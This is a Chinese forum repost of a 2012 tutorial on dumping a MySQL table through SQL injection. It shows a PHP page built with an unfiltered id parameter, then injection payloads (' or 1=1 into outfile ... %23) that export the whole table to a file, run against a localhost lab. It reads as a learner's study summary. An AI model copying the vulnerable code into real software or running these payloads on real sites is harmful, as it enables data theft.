免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 2448 | 回复: 1
打印 上一主题 下一主题

利用SQL注入漏洞拖库 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2012-01-13 16:47 |只看该作者 |倒序浏览
利用SQL注入漏洞拖库






想在本地测试的话,可以在此免积分下载:利用SQL注入漏洞拖库

同上一篇文章一样,我们需要创建数据表,并在表中出入几条数据以备测试之用。

在数据库中建立一张表:
  1. CREATE TABLE `article` (  `articleid` int(11) NOT NULL AUTO_INCREMENT,  `title` varchar(100) CHARACTER SET utf8 NOT NULL DEFAULT '',  `content` text CHARACTER SET utf8 NOT NULL,  PRIMARY KEY (`articleid`)) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=latin1;
  2. 复制代码
复制代码
在表中插入数据的操作我就不贴代码了,可以去下载下来直接导入到数据库。

接下来,写一个处理用户请求的页面,这里,我们故意不过滤用户提交过来的数据,留下个SQL注入漏洞用来测试。

代码如下:
  1. <?php       $servername = "localhost";       $dbusername = "root";       $dbpassword = "";       $dbname = "test";       $id=$_GET['id'];//id未经过滤       $conn=mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");       mysql_select_db($dbname,$conn);       mysql_query('set names utf8');       $sql = "SELECT * FROM article WHERE articleid='$id'";       $result = mysql_query($sql,$conn);       $row = mysql_fetch_array($result);       echo "<p>利用SQL注入漏洞拖库<p>";       if (!$row){              echo "该记录不存在";              exit;       }       echo "标题<br>".$row['title']."<p>";       echo "内容<br>".$row['content']."<p>";?>
  2. 复制代码
复制代码
我们直接在浏览器中输入:

http://127.0.0.1/marcofly/phpstudy/sqlinsert/showart.php?id=1

即可访问article表中id为1的一条记录

访问结果如下:





接下来,我们就利用这个漏洞(不知道该漏洞的情况下,只能通过工具+手工检测),演示一下如何将article表下载下来。

在地址栏中输入:’ into outfile 'e:/sql.txt'%23

分析:%23是#的ASCII码,由于在地址栏中直接输入#后到数据库系统中会变成空,需要在地址栏中输入%23,那么才会变成#,进而注释掉后面的sql语句。

运行之后,打开E盘,发现多了一个sql.txt文件,打开之后,里面就是表article中的一条记录。

为什么只有一条记录呢?难道该数据表就只有一条记录?不是这样的,因为我们只检索id为1的一条记录而已,那么能否将article表中的所有记录一次性全部下载下来呢?

答案是可以的,只要你的构造的SQL语句足够灵活(再次提出了构造SQL语句的灵活性)。



       分析一下,当在URL地址栏中输入’into outfile 'e:/sql.txt'%23的时候,合并到sql查询语句中变为:




       SELECT * FROM article WHERE articleid='5' into outfile 'e:/whf.txt'#'



       仔细分析下之后,我们可以这样子构造SQL语句:




       SELECT * FROM article WHERE articleid='' or 1=1 into outfile 'e:/whf.txt'#'



      这样的话,无论如何WHERE子句总是为真,换句话说,该sql语句等价于如下:




      SELECT * FROM article into outfile 'e:/whf.txt'#'



      懂了吧,该sql语句在先执行select语句,将表article中的所以内容全部检索出来,然后再执行into outfile 'e:/whf.txt'#'将内容导出来。



      不信的话,你执行下……



      利用SQL注入漏洞,我们可以猜测表名,列名,用户的密码长度(LEFT函数)等等,当然了,如果能直接向以上的演示那样将表中的数据全部导出的话就没必要去猜表名列名等等。



      有点累了,就写到这里了。

      利用SQL注入漏洞登录后台和利用SQL注入漏洞拖库是我学习了相关内容之后的一点小结,没啥深度,正如文章开头所说,权当总结,别无它意。

原创文章:WEB开发_小飞

转载请注明:http://www.cnblogs.com/hongfei/a ... njection-tuoku.html

论坛徽章:
0
2 [报告]
发表于 2012-01-13 16:47 |只看该作者
谢谢分享
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP